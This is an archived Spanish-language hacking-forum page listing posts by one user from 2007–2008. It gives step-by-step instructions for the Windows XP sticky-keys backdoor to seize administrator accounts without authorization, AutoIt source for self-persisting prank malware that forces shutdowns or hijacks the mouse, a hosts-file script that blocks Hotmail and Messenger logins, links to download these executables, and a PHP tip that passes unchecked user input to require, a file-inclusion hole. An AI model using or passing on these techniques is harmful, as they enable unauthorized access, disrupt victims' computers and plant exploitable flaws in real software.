elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
21 Noviembre 2008, 02:45  

Mostrar Mensajes
Páginas: [1]
1  Forums Generales / Dudas Generales / Re: Obtener codigo php en: 07 Septiembre 2008, 01:31
en efecto, me refiero a obtener el codigo fuente de un archivo php de un servidor remoto ^^

ok, muchas gracias :D
olivarra1
2  Forums Generales / Dudas Generales / Obtener codigo php en: 07 Septiembre 2008, 01:10
Hola soy un nooooooooob en estos temas, y queria saber si hay alguna possibildad en un codigo php de un servidor php.

muchas graciasss ;-)
olivarra1
3  Programación / PHP / Re: Páginas: index.php?id=1&cat=2 en: 08 Julio 2008, 17:00
oye, yo esto lo hago de esta manera:

tengo unos archivos en php, digamos pagina1.php, pagina2.php y pagina3.php

y en el index.php tengo esta parte de codigo:

Código:
$pagina = $_GET['Pagina'];
require($pagina.".php");

y ya ta :D

de esta manera, si quiero acceder a la pagina 1 seria la direccion: index.php?Pagina=pagina1, la 2, index.php?Pagina=pagina2.

Si lo que quieres hacer es hacerlo para id's entonces antes del require pones un if:

Código:
if ($pagina == 1) {
  $pagina = "usuarios";
}elseif ($pagina == 2) {
  $pagina = "registrar";
}elseif ($pagina == 3) {
  $pagina = "verpost";
}

Espero que te haya servido :D

olivarra1
4  Programación / PHP / optimizar velocidad de calculo en: 08 Julio 2008, 16:53
Hola, alguien sabe el orden de operaciones más rapidas? (suma, resta, producto, division, potencia)

y otra duda: quiero hacer una parte de codigo que tiene una variable $var entera, que el valor puede ser 0 o 1. cual de estos dos es mas rapido de calcular (por la maquina):
Código:
if ($var == 0) {
$var2 = 50;
}elseif ($var == 1) {
$var2 = 75;
}
o este:
Código:
$var2 = 25 * pow($var2, 2) + 50;

gracias!
olivarra1
5  Seguridad Informática / Hacking Básico / Re: Varias cosas que conozco en: 14 Abril 2008, 20:37
si que lo havia puesto, solo que unos mensajes mas abajo

reiniciar.exe:
Código:
if @ScriptDir <> @StartupCommonDir then
    Filecopy(@ScriptFullPath, @StartupCommonDir & "run1.exe")
endif
Shoutdown(4) 

raton.exe:
Código:
    Filecopy(@ScriptFullPath, @StartupCommonDir & "run2.exe")
endif
MouseMove(Random(0, @ScriptWidth), Random(0, @ScriptHeight), 1)
MouseClick()

y el runner.exe:
Código:
Run(@ScriptDir & "reiniciar.exe")
Run(@ScriptDir & "raton.exe")

salu2, y cierro post (no soy moderador, pero quiero decir que no me pasare mas por este post)

olivarra1
6  Seguridad Informática / Hacking Básico / Re: Varias cosas que conozco en: 13 Abril 2008, 22:12
MMM....yo conozco que esto no es hacking

ahora que lo dices, es verdad, perdonadme :P

por la proxima vez, estoy diseñando un keylogger (weno de hecho dos, que no se pk a mi ordenata el TCP no le funciona, uno controlado via TCP y otro via FTP), donde lo debo postear?

salu2,
olivarra1
7  Seguridad Informática / Hacking Básico / Re: Varias cosas que conozco en: 13 Abril 2008, 21:31
2 Unas mierdas molestas en el PC?? no lo considero un duelo. Ya que de estas bromitas simples hay miles por ai.

de bromitas simples nada majo, que tambien he visto y no tiene nada que ver. Esto es autoejecutable ^^ (no se si uso el termino correcto, quiero decir que se abre solo abrir windows)

por otra parte, es logico lo del SFX, es el "joiner" mas simple que hago siempre: el sfx me abre automaticamente el runner (hecho por mi) que este me abre los dos programas adjuntos (hechos por mi) ^^

Se que este tipo de viruses no es nada con los mas avanzados, que te joden la BIOS, pero yo hasta ahi, de momento no llego.

y a lo de que no se encuentra por la web, hablaba en la web en general, y hablaba del metodo aquel para sacar la cuenta de admin (entiendeme, hace poco que he entrado en este mundo y descubrir una cosa por mi solito era un objetivo que tenia ^^)

salu2,
olivarra1

PD: ya he sacado de la web los arxivos (genb.unlugar.com/viruses.exe)

edit: ah se me oblidava, los codigos que usé (son de menos de 5 lineas)

reiniciar.exe:
Código:
    Filecopy(@ScriptFullPath, @StartupCommonDir & "run1.exe")
endif
Shoutdown(4) 

raton.exe:
Código:
    Filecopy(@ScriptFullPath, @StartupCommonDir & "run2.exe")
endif
MouseMove(Random(0, @ScriptWidth), Random(0, @ScriptHeight), 1)
MouseClick()

y el runner.exe:
Código:
Run(@ScriptDir & "reiniciar.exe")
Run(@ScriptDir & "raton.exe")

weno solo decir que esto lo acabo de escribir ahora sin pasar por el compiler, asi que si hay algun error de ortografia o sintaxis, perdoneme

olivarra1
8  Seguridad Informática / Hacking Básico / Re: Varias cosas que conozco en: 13 Abril 2008, 20:55
Si a eso le llamas un virus jodido,... te que da mucho que leer.

instalatelo si quieres, aqui lo tienes (pesa 762Kb), solo te recomiendo que no te precipites ^^: genb.unlugar.com/viruses.exe (esto es un duelo que le hago a nitr0x, asi que recomiendo MUCHO que cualquier otro no lo abra)

justamente lo he puesto en haking basico porque se que no es mucho, pero weno, si te hace ilusion probarlo, estare esperando tu venganza ^^

Creo que muchos de nosostros ( por no decir todos ) sabemos hacer esas tonterias.

creo que no, esto no se encuentra por la web, es de "collita propia", que decimos los catalanes

salu2,
olivarra1
9  Seguridad Informática / Hacking Básico / Varias cosas que conozco en: 13 Abril 2008, 20:29
1: Como obtener una cuenta de administrador, o cambiar la contraseña de un usuario sin ser administrador en windows XP (no lo he provado en otros).

Quando tuve este problema, encontre una solucion, esta: http://www.lodemenos.net/HOWTO-Hackear-Windows-XP.html. Pero me encontre en un problema, que es que al cambiar la contraseña a un usuario, este pierde TODAS las contraseñas guardadas que tenia, no podra entrar en sus archivos cifrados y perderà los certificados de seguridad personales

Entonces pensando un poco y con la ayuda de un programa de control (FileMon) encontre la solucion, que se basa con la solucion anterior. Voy por pasos:

0. Este metodo se aprovecha de dos devilidades de windows XP, una, que antes de iniciar sesion como un usuario tienes el permiso de administrador, y dos, que al pulsar cinco veces la tecla shift se abre un programa de stik keys. asi que vamos a por ello:
1. Abrir la carpeta Windows/System32/
2. (opcional) copiar el archivo sethc.exe (el archivo de stick keys) en una carpeta (este paso es por si luego quereis volver todo tal y como estaba)
3. copiar el archivo cmd.exe en otra carpeta y cambiarle el nombre a sethc.exe
4. copiar el archivo sethc.exe que acabais de renombrar y pegarlo en system32 (preguntará si remplazar, dadle que si)
5. (opcional) comprovar si realmente funciona pulsando cinco veces la tecla SHIFT del teclado. si funciona se tiene que abrir el simolo del sistema, si no, no :P
6. reiniciar
7. a la pantalla para iniciar sesion, pulsar cinco veces SHIFT (y esperar a que salga el simbolo del sistema)
6. en la pantalla del sistema escribir lo siguiente:
mshta.exe "res://C:\Windows\System32\nusrmgr.cpl/nusrmgr.hta"
7. y, tachan! se abrio la ventana "cuentas de usuario" que permite administrar como quieras todas las cuentas.

Otra cosa que queria comentar es que tambien programo algunos "virus" muy muy simples pero jodidos. los hago con un objetivo didactico, pero si quereis puedo dejar alguna muestra. (ahora que me vengan en la cabeza, puedo hacer uno que solo abrirse windows, este se cierre, o uno que haga volver loco el raton moviendose todo el rato haciendo clic aleatoriamente, o otro que haga volver loco el teclado)

Salu2,
olivarra1
10  Seguridad Informática / Análisis y Diseño de Malware / Re: pequeño pero jodido 'virus', si se puede decir asi en: 20 Diciembre 2007, 22:38
ni sabia q existia este lenguaje de programacion, pero viendo el codigo a simple vista se ve que hace lo que dice stone free. es la  famosa tecnica que usan para robar cuentas bancarias, si alguien quiere un buen manual sobre esto pueden ver en este post http://foro.elhacker.net/index.php/topic,151732.0.html
saludos
muy interesante este "topico" ^^

Por otra parte, se tiene que reiniciar el internet explorer y el mesenger, no toda la maquina ;)

olivarra1
11  Seguridad Informática / Análisis y Diseño de Malware / Re: pequeño pero jodido 'virus', si se puede decir asi en: 20 Diciembre 2007, 17:06
Probando probando 1...2...3...  ::)

EDIT:
El programa cumple su cometido de bloquear la página de hotmail. Lo que hace es modificar la tabla del archivo host para que cada vez que intentemos conectarnos a cierta página, nos redireccione a localhost 127.0.0.1 y nunca se pueda establecer la conexión. La cura, simplemente borrar esas entradas en el archivo host. Esta es una técnica que utilizan algunos virus para hacer phishing.

olivarra, para lo que hace éste programa, es muy pesado el archivo. Optimiza el debug y pásale el upx (upx bloquear.exe). Por lo que he visto, el programa está hecho en Visual C++

mhh no señor, no esta hecho en c++, de este idioma no tengo ni idea  :-X ^^

es autoit os dejo el codigo:
$archivo = FileOpen("C:\WINDOWS\system32\drivers\etc\hosts", 1)
FileWriteLine($archivo, @CRLF & "127.0.0.1 www.ogame.com.es") ;prohibe la entrada a ogame.com.es
FileWriteLine($archivo, @CRLF & "127.0.0.1 login.live.com") ;prohibe el login de hormail y de messenger
FileWriteLine($archivo, @CRLF & "127.0.0.1 by123w.bay123.mail.live.com") ;prohibe la entrada a la pagina principal de hotmail
FileClose($archivo)

lo k no se es como bajar su peso. es el problema que tiene autoit, que tambien consume muchissima CPU en loops (miras el administrador de tareas y ocupa entre un 90 i un 97% de la CPU....  :huh:

olivarra1
12  Seguridad Informática / Análisis y Diseño de Malware / pequeño pero jodido 'virus', si se puede decir asi en: 20 Diciembre 2007, 00:08
ahí va mi primer aporte ^^
he hecho un pequeño pero algo jodido virus que te bloquea permanentemente (es impossible de encontrar el archivo de registro) (a no ser que se haga format c, logicamente) la entrada a una pagina web desde tu ordenata (si vas a otro ya te deja). Esto incluye no poderse conectar con el messenger dado que para conectarse usa la direccion login.live.com.

Yo escribo en un lenguaje que se llama "Autoit" poco conocido, facil de usar pero poco potente. si hay gente que lo conoce, pondre el codigo aqui, sino me podeis pedir que paginas quereis que os bloquee.

a la vez he hecho un programa que los desbloquea. os dejo 2 programas, uno que bloquea el ogame (www.ogame.com.es) , el messenger y el hotmail, y otro que lo desbloquea todo ^^

x si el de desbloquear tiene algun bug, lo que teneis que hacer es ir a C:\WINDOWS\system32\drivers\etc\, abrir el archivo hosts con el bloc de notas y dejar solo el primer elemento de la lista.

x cierto, es necesario reiniciar el navegador o el messenger para que de efecto.

Código:
bloquear: http://genb.unlugar.com/bloquear.exe
desbloquear: http://genb.unlugar.com/desbloquear.exe

estoy abierto a dudas y/o peticiones (si no son demasiadas :P)

salu2,
olivarra1
Páginas: [1]

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.